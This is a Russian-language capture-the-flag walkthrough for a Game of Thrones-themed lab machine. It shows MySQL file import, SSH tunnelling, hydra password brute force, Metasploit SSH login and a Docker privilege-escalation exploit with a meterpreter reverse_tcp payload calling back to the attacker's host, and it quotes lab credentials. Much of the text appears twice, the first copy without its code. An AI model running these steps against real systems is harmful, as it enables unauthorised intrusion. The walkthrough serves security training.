Воспользуемся информацией и взглянем на доступные таблицы.
Заглянем внутрь таблицы
Мы видим строку закодированную азбукой Морзе. Расшифруем её: /etc/mysql/flag. Попытка получить доступ к файлу укажет нам на его отсутствие. Вспомнив подсказку выше, мы поймём что у нас недостаточно прав. Давайте взглянем на наши права
Таким образом мы узнаём, что можем импортировать файлы в базу данных. Создаём таблицу Flag
Импортируем наш файл в созданную таблицу
Теперь, взглянув на содержимое таблицы, мы увидим 7ой флаг. А также креды для ssh доступа.
Воспользуемся ими
Покопавшись в системе мы найдём два файла
Последний содержит подсказку: мы должны подключится по ssh к ip:172.25.0.2 и использовать файл digger.txt для брутфорса пароля.
Скачаем digger.txt на свою систему
Создадим тунель, назначим ему порт 2222
Теперь воспользуемся hydra для перебора пароля к 172.25.0.2. В качестве username мы укажем root, и используем digger.txt в качестве словаря:
Так мы узнаем пароль:
Воспользуемся нашим тунелем для подключения:
Просмотрев файлы мы найдём наш секретный флаг, а так же креды для ssh доступа.
Воспользуемся metasploit для подключения через ssh, используя найденные креды.
После поиска очевидных возможностей для повышение привилегий, таких как исполняемых файлов с установленным битом setuid и эксплойтов для ядра, мы заметили, что сервер лежит в докер контейнере. Поэтому мы воспользуемся эксплойтом повышения привилегий из metasploit.
Прообгредив нашу сессию, убедимся что мы root.
Покопавшись, мы найдем запароленный zip архив: final_battle и checkpoint.txt, в котором находится псевдокод. Псевдокод расскажет нам как получить пароль используя секретные флаги что мы нашли.
На данный момент у нас есть 2 секретных флага. Вновь пройдясь по файловой системе, мы найдем два mp3 файла. Воспользовавшись exiftool мы найдём ещё один флаг в одном из них.
Теперь перепишим псевдокод на python
Запустим созданный скрипт и найдём пароль
Теперь распакуем архив
Мы видим файл flag.txt, просмотрев его мы найдем наш последний флаг.
Автор оригинала: Sayantan Bera - технический писатель хакерских статьей и энтузиаст кибербезопасности. Контакты
Заглянем внутрь таблицы
Мы видим строку закодированную азбукой Морзе. Расшифруем её: /etc/mysql/flag. Попытка получить доступ к файлу укажет нам на его отсутствие. Вспомнив подсказку выше, мы поймём что у нас недостаточно прав. Давайте взглянем на наши права
Таким образом мы узнаём, что можем импортировать файлы в базу данных. Создаём таблицу Flag
Импортируем наш файл в созданную таблицу
Теперь, взглянув на содержимое таблицы, мы увидим 7ой флаг. А также креды для ssh доступа.
Воспользуемся ими
Код:
ssh daenerystargaryen@192.168.1.133
Покопавшись в системе мы найдём два файла
Код:
digger.txt, checkpoint.txt
Скачаем digger.txt на свою систему
Код:
scp digger.txt root@192.168.1.116
Создадим тунель, назначим ему порт 2222
Код:
ssh daenerystargaryen@192.168.1.133 –L 2222:172.25.0.2:22 –N
Теперь воспользуемся hydra для перебора пароля к 172.25.0.2. В качестве username мы укажем root, и используем digger.txt в качестве словаря:
Так мы узнаем пароль:
Код:
Dr4g0nGl4ss
Просмотрев файлы мы найдём наш секретный флаг, а так же креды для ssh доступа.
Воспользуемся metasploit для подключения через ssh, используя найденные креды.
Код:
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133
msf auxiliary(scanner/ssh/ssh_login) > set username branstark
msf auxiliary(scanner/ssh/ssh_login) > set password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner/ssh/ssh_login) > run
После поиска очевидных возможностей для повышение привилегий, таких как исполняемых файлов с установленным битом setuid и эксплойтов для ядра, мы заметили, что сервер лежит в докер контейнере. Поэтому мы воспользуемся эксплойтом повышения привилегий из metasploit.
Код:
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) > run
Прообгредив нашу сессию, убедимся что мы root.
Покопавшись, мы найдем запароленный zip архив: final_battle и checkpoint.txt, в котором находится псевдокод. Псевдокод расскажет нам как получить пароль используя секретные флаги что мы нашли.
На данный момент у нас есть 2 секретных флага. Вновь пройдясь по файловой системе, мы найдем два mp3 файла. Воспользовавшись exiftool мы найдём ещё один флаг в одном из них.
Код:
exiftool game_of_thrones.mp3
Теперь перепишим псевдокод на python
Запустим созданный скрипт и найдём пароль
Теперь распакуем архив
Код:
7z e final_battle
Мы видим файл flag.txt, просмотрев его мы найдем наш последний флаг.
Автор оригинала: Sayantan Bera - технический писатель хакерских статьей и энтузиаст кибербезопасности. Контакты
Последнее редактирование:
Комментарии
1